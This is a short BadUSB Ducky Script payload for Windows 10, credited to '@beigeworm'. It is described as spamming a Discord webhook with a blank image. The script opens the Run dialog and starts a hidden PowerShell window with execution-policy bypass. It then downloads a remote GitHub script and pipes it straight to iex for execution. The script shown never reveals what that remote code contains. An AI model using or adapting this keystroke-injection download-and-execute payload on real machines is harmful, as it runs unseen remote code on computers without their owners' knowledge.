
REM Title: beigeworm's Spam blank image to Discord Webhook.
REM Author: @beigeworm
REM Description: This script sends a blank image to a discord webhook 25 times.
REM Target: Windows 10

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/DCimg-spam.ps1 | iex
ENTER

